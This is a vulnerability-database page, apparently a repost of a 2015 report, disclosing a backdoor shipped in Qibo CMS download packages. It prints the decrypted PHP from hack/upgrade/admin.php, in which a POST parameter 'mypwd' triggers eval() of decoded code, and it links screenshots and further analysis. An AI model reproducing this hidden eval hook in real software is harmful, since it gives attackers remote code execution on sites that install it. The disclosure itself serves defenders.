|齐博cms所有产品发现后门 - VULHUB开源网络安全威胁库

齐博cms所有产品发现后门

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：在另一个地方又发现后门了，敢不放后门吗？还有，压缩包下载下来的时候，360直接报有phpshell，360都看不下去了 = = ### 详细说明：齐博cms整站系统后门文件 ../hack/upgrade/admin.php CRC32 28510105 以及剩下的存在于博客系统下载系统考试系统黄页系统新闻媒体系统图片系统视频系统知道系统企业系统 B2B系统等等（反正官网所有的下载包里都有这个后门）文件在 ../hack/upgrade/admin.php CRC32 5101A2EE 两个后门文件虽然CRC32值不同，不过解密后代码是相同的，采用威盾加密，V7的如下： [<img src="https://images.seebug.org/upload/201503/19222104c30b3a678d51706cd8712acf2dec7b4d.jpg" alt="v7.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19222104c30b3a678d51706cd8712acf2dec7b4d.jpg) 解密代码见：http://blog.99tk.cn/wp-content/uploads/2015/03/20150319-141011-336.txt 其余的如下： [<img src="https://images.seebug.org/upload/201503/1922221661c64b72b40c1ef3a73683ad295539c5.jpg" alt="blog.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/1922221661c64b72b40c1ef3a73683ad295539c5.jpg) 解密代码见：http://blog.99tk.cn/wp-content/uploads/2015/03/20150319-141147-926.txt 加密后代码长，不贴了，解密后代码如下： ``` if($_POST['mypwd']){ require_once(dirname(__FILE__)."/../../inc/qq.api.php"); @eval(qqmd5("UV9AGx4fXkEQRAgeGkFFExhCWVELFglVQkwFVgwdAVgcREgWERQRUQsaQllFERtfe55b74ae89",'DE',$_POST['mypwd']));//这是什么呢？ } if($job=="get"&&$Apower[upgrade_ol]) { hack_admin_tpl('get'); } elseif($action=="get"&&$Apower[upgrade_ol]) { $fileurl="http://down.qibosoft.com/upgrade.zip"; if($code=file_get_contents($fileurl)) { write_file(ROOT_PATH."cache/upgrade.zip",$code); } elseif($code=file($fileurl)) { write_file(ROOT_PATH."cache/upgrade.zip",$code); } elseif(copy($fileurl,ROOT_PATH."cache/upgrade.zip")) { } elseif($code=sockOpenUrl($fileurl)) { write_file(ROOT_PATH."cache/upgrade.zip",$code); } require_once(ROOT_PATH."inc/class.z.php"); $z = new Zip; makepath(ROOT_PATH."cache/upgrade"); $z->Extract(ROOT_PATH."cache/upgrade.zip",ROOT_PATH."cache/upgrade"); unlink(ROOT_PATH."cache/upgrade.zip"); echo "<META HTTP-EQUIV=REFRESH CONTENT='0;URL=$webdb[www_url]/cache/upgrade/index.php'>"; exit; } ``` 对于该后门的分析可以见这儿： http://www.91ri.org/5147.html ### 漏洞证明：对于该后门的分析可以见这儿： http://www.91ri.org/5147.html 如图： [<img src="https://images.seebug.org/upload/201503/20224805b939a8ca8a3c526c654b32119f2c2afe.jpg" alt="b2b.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/20224805b939a8ca8a3c526c654b32119f2c2afe.jpg) [<img src="https://images.seebug.org/upload/201503/20224822597668c3e96f74cf63133e9e052fae0c.jpg" alt="blog.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/20224822597668c3e96f74cf63133e9e052fae0c.jpg) [<img src="https://images.seebug.org/upload/201503/202248306ae1bde5e34755a34ed17901455f4042.jpg" alt="download.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/202248306ae1bde5e34755a34ed17901455f4042.jpg) [<img src="https://images.seebug.org/upload/201503/202248367671a540193cf771d9a481d05fb72054.jpg" alt="exam.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/202248367671a540193cf771d9a481d05fb72054.jpg) [<img src="https://images.seebug.org/upload/201503/20224844be2e696f34a7217225b0197910057d70.jpg" alt="fenlei.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/20224844be2e696f34a7217225b0197910057d70.jpg) [<img src="https://images.seebug.org/upload/201503/2022485441031061ee8e90150b64f90f01afdacb.jpg" alt="hy.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/2022485441031061ee8e90150b64f90f01afdacb.jpg) [<img src="https://images.seebug.org/upload/201503/202249018e82248b08282adf401c8d9817befbf1.jpg" alt="news.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/202249018e82248b08282adf401c8d9817befbf1.jpg) [<img src="https://images.seebug.org/upload/201503/2022490836ae5089a8e24cd28822a1bd94f2c513.jpg" alt="photo.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/2022490836ae5089a8e24cd28822a1bd94f2c513.jpg) [<img src="https://images.seebug.org/upload/201503/2022491789f674fe2cc0051414dcc19b43a949a7.jpg" alt="qy.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/2022491789f674fe2cc0051414dcc19b43a949a7.jpg) [<img src="https://images.seebug.org/upload/201503/20224926b76763cd3089dbf87e90c4bb24ad8a44.jpg" alt="v7.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/20224926b76763cd3089dbf87e90c4bb24ad8a44.jpg) [<img src="https://images.seebug.org/upload/201503/20224932bfba039d83b8418b29ecbe0b95db8bb9.jpg" alt="video.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/20224932bfba039d83b8418b29ecbe0b95db8bb9.jpg) [<img src="https://images.seebug.org/upload/201503/202249426baa0e3f0d2b4c2dbd53544be0c2bf8d.jpg" alt="zhidao.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/202249426baa0e3f0d2b4c2dbd53544be0c2bf8d.jpg)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™